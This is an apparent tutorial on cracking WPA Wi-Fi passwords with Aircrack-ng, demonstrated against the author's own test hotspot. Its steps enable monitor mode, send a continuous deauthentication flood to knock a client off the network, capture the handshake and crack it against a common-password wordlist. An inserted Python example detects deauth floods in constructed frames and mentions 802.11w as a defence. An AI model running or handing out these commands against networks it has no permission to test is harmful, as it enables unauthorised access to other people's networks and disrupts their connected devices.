Aircrack-ng
Capturing WPA handshakes and cracking network passwords.
Requirements
Wi-Fi adapter that supports monitor mode.
Linux machine or virtual machine.
Aircrack-ng.
List of common passwords. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Step 1: Installation
sudo apt update
sudo apt-get install -y aircrack-ng
Step 2: Check the available Wi-Fi cards and disable any processes that may interfere with monitor mode.
ip a

The internal Wi-Fi card (wlan0 here) can interfere with the deauth process, so we bring it down with this command.
sudo ifconfig wlan0 down
This command lists any processes that may interfere with our Wi-Fi adapter in monitor mode.
sudo airmon-ng check
This command then kills any of the processes listed from the command above.
sudo airmon-ng check kill

Step 3: The next command puts the Wi-Fi adapter (wlan1 here) into monitor mode; the monitor interface is then called wlan1mon.
sudo airmon-ng start wlan1

Step 4: Next we want to grab the BSSID (the access point's MAC address, shown in hex) and the channel of our target network.
sudo airodump-ng wlan1mon

Our hotspot named TestNetwork is operating on channel 6 with the MAC address shown.
Step 5: Now we only want to listen for devices connecting to our target network, so we lock airodump-ng to that channel (6 here) and BSSID and write the capture to a file with the prefix "capture".
sudo airodump-ng -c 6 -w capture -d (TARGET BSSID) wlan1mon

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join. -a is the access point's BSSID and -c is the client's MAC address (both are MAC addresses, not hashes).
sudo aireplay-ng --deauth 0 -a (AP BSSID) -c (CLIENT MAC) wlan1mon
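From the monitoring side, the burst of deauthentication frames this step produces is exactly what a wireless IDS keys on. The script below is an added example (not part of this tutorial and not Aircrack-ng code): it parses the fixed 802.11 management header of raw frames (no radiotap header, which a real capture would carry in front of each frame) and raises an alert when one sender addresses more than a threshold of deauth/disassoc frames to the same BSSID inside a one-second window. The frames, MAC addresses, timestamps and threshold are all constructed for the demonstration. Where the access point and clients support Protected Management Frames (802.11w), forged deauthentication frames are rejected outright; where they do not, detection of the burst is the fallback.

```python
import struct
from collections import defaultdict

# 802.11 management subtypes we care about (type 0).
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(raw):
    """Render a 6-byte address as aa:bb:cc:dd:ee:ff."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame):
    """Parse the 24-byte fixed 802.11 header (no radiotap). Returns a dict or None.

    Frame control byte 0 packs: protocol version (2 bits), type (2 bits), subtype (4 bits).
    Management frames use addr1=dst, addr2=src, addr3=BSSID.
    """
    if len(frame) < 24:
        return None
    fc0, _fc1, _duration, a1, a2, a3, seq_ctrl = struct.unpack("<BBH6s6s6sH", frame[:24])
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "dst": mac_str(a1),
        "src": mac_str(a2),
        "bssid": mac_str(a3),
        "seq": seq_ctrl >> 4,   # upper 12 bits are the sequence number
        "reason": None,
    }
    # Deauth and disassoc carry a 2-byte reason code right after the header.
    if ftype == 0 and subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).

    Returns one alert per (src, bssid) pair whose deauth/disassoc count reaches
    `threshold` inside any sliding window of `window_s` seconds.
    """
    events = defaultdict(list)
    for ts, raw in frames:
        p = parse_mgmt_frame(raw)
        if p and p["type"] == 0 and p["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            events[(p["src"], p["bssid"])].append(ts)

    alerts = []
    for (src, bssid), stamps in events.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"src": src, "bssid": bssid, "count": end - start + 1, "t": stamps[start]})
                break  # one alert per sender is enough for the demonstration
    return alerts


# --- constructed sample traffic (hypothetical addresses, not from any real capture) ---
def build_frame(fc0, dst, src, bssid, seq, reason=None):
    """Build a minimal 802.11 frame: fixed header plus optional reason code."""
    frame = struct.pack("<BBH6s6s6sH", fc0, 0, 0, dst, src, bssid, seq << 4)
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


AP = bytes.fromhex("001122334455")      # constructed access point BSSID
CLIENT = bytes.fromhex("66778899aabb")  # constructed client MAC
BROADCAST = b"\xff" * 6

SAMPLE_FRAMES = [
    (0.0, build_frame(0x80, BROADCAST, AP, AP, 1)),              # beacon: ignored
    (0.2, build_frame(0x08, AP, CLIENT, AP, 7)),                 # data frame: ignored
    (0.5, build_frame(0xC0, CLIENT, AP, AP, 2, reason=3)),       # a single legitimate deauth
]
# Burst of 8 deauths within 0.4 s, spoofing the AP's address toward the client.
for i in range(8):
    SAMPLE_FRAMES.append((2.0 + i * 0.05, build_frame(0xC0, CLIENT, AP, AP, 100 + i, reason=7)))

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood: src={alert['src']} bssid={alert['bssid']} "
              f"count={alert['count']} starting at t={alert['t']:.2f}s")
```

The single deauth at 0.5 s never triggers an alert on its own; only the burst at 2.0 s crosses the threshold. On a real monitor-mode capture you would strip the radiotap header (its length is in bytes 2-3 of the frame) before handing each frame to parse_mgmt_frame, and tune threshold and window_s to the site's normal roaming behaviour.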


Step 7: Once we have captured the WPA handshake we can turn off monitor mode on our adapter and attempt to crack the password using a list of commonly used passwords. The capture file is the one airodump-ng wrote in step 5 (capture-01.cap for the "capture" prefix used above), and -w takes the path to the wordlist file, not a directory.
sudo airmon-ng stop wlan1mon

sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST FILE)

Step 8: Congrats!!! 🥳🥳🥳 You have just learned how to use Aircrack-ng to capture and crack a WPA handshake.